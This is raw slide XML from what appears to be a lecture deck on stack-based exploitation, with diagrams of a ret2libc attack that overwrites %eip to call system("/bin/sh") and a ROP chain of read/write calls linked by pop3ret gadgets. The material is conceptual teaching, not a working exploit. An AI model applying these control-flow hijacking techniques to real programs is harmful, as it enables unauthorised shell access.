          <p:cNvPr id="1513" name="Shape 1513"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="4132467"/>
            <a:ext cx="2095200" cy="162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padding</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1514" name="Shape 1514"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="2084467"/>
            <a:ext cx="2095200" cy="409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0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1515" name="Shape 1515"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5671600" y="2705267"/>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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1516" name="Shape 1516"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="2910067"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1517" name="Shape 1517"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9471400" y="2109200"/>
            <a:ext cx="21200" cy="3641200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1518" name="Shape 1518"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="3609433"/>
            <a:ext cx="1183600" cy="409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Overflow</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1519" name="Shape 1519"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="2027400"/>
            <a:ext cx="2496800" cy="911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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system("/bin/sh")</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit(0)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1520" name="Shape 1520"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="288252" y="2192535"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1521" name="Shape 1521"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="2742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867" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1522" name="Shape 1522"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1523" name="Shape 1523"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="1763367"/>
            <a:ext cx="2882800" cy="182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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit:</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1524" name="Shape 1524"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="3819267"/>
            <a:ext cx="2882800" cy="25044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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system:</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>...(execute command)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1525" name="Shape 1525"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="2294067"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1526" name="Shape 1526"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5018800" y="2090067"/>
            <a:ext cx="15016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FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>argument 1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C986233-B83D-40B0-83BF-B05575D8FBB2}"/>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ret2libc</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708"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1709" name="Shape 1709"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="730250"/>
            <a:ext cx="4579938" cy="763588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>连续调用多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1710" name="Shape 1710"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383600" y="4493567"/>
            <a:ext cx="6415600" cy="6084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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>read(int fd, char *buf, int len);</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1711" name="Shape 1711"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="2234767"/>
            <a:ext cx="20952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char *buf</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1712" name="Shape 1712"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="2644367"/>
            <a:ext cx="20952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int fd=1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1713" name="Shape 1713"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="1825167"/>
            <a:ext cx="20952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int len</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1714" name="Shape 1714"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="3053967"/>
            <a:ext cx="20952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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>pop3ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1715" name="Shape 1715"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="3463567"/>
            <a:ext cx="20952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write</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1716" name="Shape 1716"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="3873167"/>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int len</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1717" name="Shape 1717"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="4282767"/>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char *buf</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1718" name="Shape 1718"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="4692367"/>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int fd=0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1719" name="Shape 1719"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="5101967"/>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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>pop3ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1720" name="Shape 1720"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="5511567"/>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read</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
